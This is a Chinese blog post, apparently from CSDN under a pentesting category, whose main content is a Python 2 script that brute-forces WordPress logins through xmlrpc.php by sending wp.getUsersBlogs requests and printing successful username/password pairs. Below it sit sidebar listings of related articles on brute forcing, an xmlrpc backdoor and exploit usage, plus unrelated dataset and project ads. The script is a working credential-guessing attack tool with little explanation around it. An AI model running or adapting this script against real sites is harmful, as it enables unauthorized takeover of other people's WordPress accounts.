xmlrpc.php brute attack

最新推荐文章于 2024-07-18 11:12:39 发布
最新推荐文章于 2024-07-18 11:12:39 发布
阅读量1.2k 收藏
点赞数
分类专栏: Pentesting
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/38073203
版权 



#!/usr/bin/env python
# -*- coding: utf8 -*-


import sys
import httplib
from urllib2 import urlopen, HTTPError, URLError
from xml.dom.minidom import parseString
from xml.parsers.expat import ExpatError


def brute(host, port, username, password):
    """WordPress xmlrpc.php brute force attacks """
    payload = """<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>wp.getUsersBlogs</methodName>
    <params>
    <param><value>%s</value></param>
    <param><value>%s</value></param>
    </params>
    </methodCall>""" % (username, password)

    # xmlrpc.php location
    url = "http://%s:%s/xmlrpc.php" % (host, port)

    # post payload data
    try:
        httpobj = urlopen(url, data=payload, timeout=10)
    except HTTPError:
        print "[-] 404 not found."
        return False
    except URLError:
        print "[-] host is down."
        return False
    except httplib.BadStatusLine:  # www.metasploit.com
        return False
    except httplib.IncompleteRead:  # hao123.com
        return False
    else:
        # status code != 200, ex: 302
        if 200 != httpobj.getcode():
            print "[-] Wordpress xmlrpc.php does not exist."
            return False

        # status code == 200
        # xmlrpc.php exists
        response = httpobj.read()

        try:
            dom = parseString(response)
        # failed to parse xml data
        except ExpatError:
            print "[-] Wordpress xmlrpc.php does not exist."
        else:
            # the first member tag is for failed or success.
            # 403 for failed, 0 for success
            members = dom.getElementsByTagName('member')
            auth_check = members[0]

            # name = auth_check.getElementsByTagName('name')[0].toxml()
            # name = name.replace('<name>', '').replace('</name>')

            # bol - 0
            booleans = auth_check.getElementsByTagName('boolean')
            if len(booleans) < 1:
                print "[-] failed : [ %s:%s ]" % (username, password)
            else:
                # boolean is for successful login.
                bret = booleans[0].toxml()
                bret = bret.replace('<boolean>', '').replace('</boolean>', '')

                if 0 == int(bret):
                    print "[+] success: [ %s:%s ] " % (username, password)
                    return True
                elif 1 == int(bret):
                    print "[+] success: [ %s:%s ] - A" % (username, password)
                    return True
                else:
                    print "[-] failed : [ %s:%s ]" % (username, password)
                    return False
            return False

if __name__ == "__main__":
    if len(sys.argv) == 2:
        brute(sys.argv[1], '80', 'admin', 'password')
    else:
        print "brute.py www.example.com (default port: 80)"

Nixawk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透测试笔记】九、Brute Force Attacks(暴力破解)
【User Not Found】的博客
04-27 1416
We are all in the gutter, but some of us are looking at the stars. 身在井隅,心向璀璨。 本文仅供学习交流,正确使用渗透测试,遵守相关法律法规,请勿用于非法用途。 目录实验环境关于漏洞使用工具crunch - 字典创建工具hydra - 暴力破解工具基于DVWA的实际测试 实验环境 本实验基于以下环境: 【渗透测试笔记】一、...
pfsense_xmlrpc_backdoor:通过 xmlrpc.php 在 pfSense 防火墙上放置 PHP 后门的简单示例
06-12
快速介绍这是一个示例有效负载以及滥用 pfSense 的 xmlrpc.php 函数来建立后门并获得对 pfSense 防火墙的根级访问权限的示例。 这个漏洞是post-auth的(对于管理员账户),根据pfSense安全团队的说法,它被认为不是...
Brute force Attack
jimmyleeee的专栏
08-05 2365
1 IntroductionA common threat that webdevelopers face is a password-guessing attack known as a brute force attack. Abrute-force attack is an attempt to discover a password by systematicallytrying ever...
黑客技术提高
wcc526的专栏
10-28 2875
一.远程口令猜解          流行与常用的工具包括Legion,enum,SMBGrind,NTScan.国内比较流行XScan          远程桌面 3389 端口常用猜解TSGrinder,Brutik,Fast RDP Brute,DUBrute          MS SQL 1433端口 1434 端口 使用sqlbf,Auto-SQL
C++ 插入排序法 stl实现
一直在改错的蓝熊猫
04-08 619
// insertsort.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 // #include "pch.h" #include <iostream> #include <vector> using namespace std; void insertSort(vector<int> &b, int n) { f...
HTB-Apocalyst
qq_53142368的博客
07-18 1166
hack the box
【msf】msf渗透wordpress博客学习
qq_20410657的博客
10-06 445
安装wordpress的web端因为版本问题有可能存在漏洞,以下是一个简单的web漏洞渗透过程。wpscan主要用于wordpress博客网站的漏洞。wordpress网址。
NMAP6 网络探索和安全审计秘籍(五)
龙哥盟
07-18 347
Nmap 脚本引擎于 2007 年在版本 4.5 中推出,以利用在端口或网络扫描期间收集的信息,并使用强大的脚本语言 Lua 执行附加任务,从而将 Nmap 的功能扩展到一个全新的水平。这一功能已经成为一个完整的武器库,已经正式包含了近 300 个脚本。您可以通过这一功能完成的任务数量令人印象深刻,就像您在本书中学到的那样。Lua 是一种脚本语言,目前在其他重要项目中使用,如魔兽世界、Wireshark 和 Snort,有很好的原因。Lua 非常轻量级和可扩展。
靶机渗透-----DC-2
Z_Grant的博客
09-17 2955
文章目录一,工具介绍(1)cewl密码生成器(2)WPScan二,测试流程(1)主机发现(2)根据80端口的进一步测试(3)攻击准备(4)结合扫描出来的服务,尝试SSH登录 一,工具介绍 (1)cewl密码生成器 参考文章 用途 cewl是一个ruby应用,爬行指定url的指定深度。结果会返回一个单词列表,这个列进行密码爆破。 . 原理 爬取网站上的信息,遍历目录。生成一些可能的密码组合。...
Kali linux 2016.2(Rolling)中的auxiliary模块详解
weixin_33858336的博客
11-15 1366
root@kali:~# msfconsole ______________________________________________________________________________ | ...
Ub.XMLRPC.rar_xmlrpc
09-22
在这个"Ub.XMLRPC.rar_xmlrpc"压缩包中,我们很可能是找到了一个C#实现的XMLRPC接口开发示例,用于web开发,目的是与其他接口进行对接。 XMLRPC的核心概念包括以下几个方面: 1. **客户端**:客户端是发起RPC调用...
Wordpress-XMLRPC-Brute-Force-Exploit:Wordpress XMLRPC系统多方调用蛮力利用(0天)by 1N3 @ C​​rowdShield
02-05
1N3的Wordpress XMLRPC System Multicall蛮力利用漏洞,最近更新:20170215 关于: 这是对Wordpress xmlrpc.php系统多重调用功能的一种利用,影响了最新版本...用法: ./wp-xml-brute http://target.com/xmlrpc.php pas
前端项目-jquery-xmlrpc.zip
09-03
**前端项目-jquery-xmlrpc.zip** 这个前端项目的核心是利用jQuery库来实现与远程XML-RPC(Remote Procedure Call)服务的交互。XML-RPC是一种轻量级的远程调用协议,它允许客户端通过HTTP发送结构化的XML数据到...
android-xmlrpc.jar
03-07
官方版本,亲测可用
2022年全国地级市人口分布数据(全新整理)
08-15
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/140877988 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用,经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 ## 数据指标说明 资源名称:2022年全国地级市人口分布数据 区域范围:全国地级市 数据格式:.shp格式 数据规模:大于2G 数据来源:https://landscan.ornl.gov/
基于SSM++jsp的共享客栈管理系统
08-15
内容概要 共享客栈管理系统基于SSM(Spring、Spring MVC、MyBatis)框架和JSP技术开发,旨在为共享经济模式下的客栈经营者提供高效、便捷的信息管理工具。该系统集成了客栈房间管理、预订管理、入住与退房管理、账单管理以及客户信息管理等核心功能,帮助经营者全面掌控客栈的运营情况。系统支持实时更新客栈的房间状态,并能自动生成统计报表,方便经营者分析运营数据,提升管理效率。同时,系统具备多用户角色管理功能,支持不同权限的用户进行相应的操作,从而保障数据的安全性。 适用人群 本系统主要面向共享客栈经营者、房东、民宿管理公司以及IT技术人员。对于经营者和房东,系统提供了全方位的客栈管理功能,可以有效减少手工管理的工作量,提高运营效率。民宿管理公司可以利用该系统管理旗下多个客栈的日常运营情况,实现集中化管理。而IT技术人员则可以根据系统的架构,进行定制开发,满足特定客栈的个性化需求。此外,该系统也适用于需要系统化管理住宿资源的其他类似小型住宿业者。 使用场景及目标 该系统适用于多种场景,包括客栈日常的房间预订与管理、客户信息记录、账单生成及分析等。在实际使用中,经营者可以通过
JSP-个性化点餐配送系统(源码+数据库+论文).rar
最新发布
08-15
互联网系统平台的广泛应用,改变了人们生活方式的同时也优化提升了人们的生活质量,利用线上系统平台可以实现更加便捷高效的信息获取及在线操作,线上点餐系统的不断普及,让人们体验到了足不出户的点餐服务,利用线上平台信息互通的便捷性实现了商家、客户以及配送员的三方信息互通,借助点餐系统平台可以实现菜品订单信息的添加、在线下单及支付操作以及订单配送员调配。随着餐饮行业的竞争日益激烈,线下的经营模式已经无法满足很多餐厅的经营需求,借助线上系统平台不仅能够拓宽经营渠道同时也为传统的餐饮门店吸引了更多潜在客户。 结合当前餐饮行业的发展现状,本文借助SSM框架实现了点餐配送系统平台的搭建,结合主要用户角色客户、商家、配送员以及系统管理员的功能需求,通过JSP技术的应用实现了前后端的信息共享和动态页面内容呈现,借助点餐配送系统的开发实现了菜品信息管理、客户订单管理、商家配送管理等功能模块的运行,通过点餐配送系统平台的搭建实现了从菜品管理到终端配送的一系列服务内容,结合网络在线订餐系统的发展趋势,优化提升力了点餐的效率及满足更多用户的用餐需求。 关键词:SSM框架;JSP技术;MySQL数据库;点餐配送
YOLO 目标检测图像数据集:施工电缆缺陷检测
08-15
YOLO 目标检测图像数据集:施工电缆缺陷检测【包含训练集、验证集、对应标签、class文件】 数据集被处理成yolo格式,可以用于YOLO所有系列的网络训练。show脚本可以用于可视化数据,即将box目标绘制在图像上 类别个数(2):break等等【具体类别参考class类别文本文件】超过1000张数据和标签文件
xmlrpc.php 漏洞
06-01
XML-RPC 是一种远程过程调用(RPC)协议,它使用 XML 来编码其调用和响应消息。XML-RPC 协议中的一个漏洞是 xmlrpc.php 漏洞,这是一种常见的 Web 应用程序漏洞。 攻击者可以利用这个漏洞,将恶意代码注入到 xmlrpc.php 文件中,然后通过远程调用来执行这些恶意代码,从而获得对系统的控制权。攻击者可以使用这个漏洞来进行各种攻击,如代码执行、文件读取、SQL 注入、拒绝服务等。 要防止 xmlrpc.php 漏洞,应该采取以下措施: 1. 禁用 xmlrpc.php 文件,或者限制其访问权限。 2. 更新 Web 应用程序到最新版本,以修复潜在的漏洞。 3. 使用防火墙,限制对 xmlrpc.php 文件的访问。 4. 使用安全插件,如 Wordfence,以检测和防止攻击。 总之,保持 Web 应用程序的安全性是非常重要的,应该采取适当的措施来防止 xmlrpc.php 漏洞和其他潜在的安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值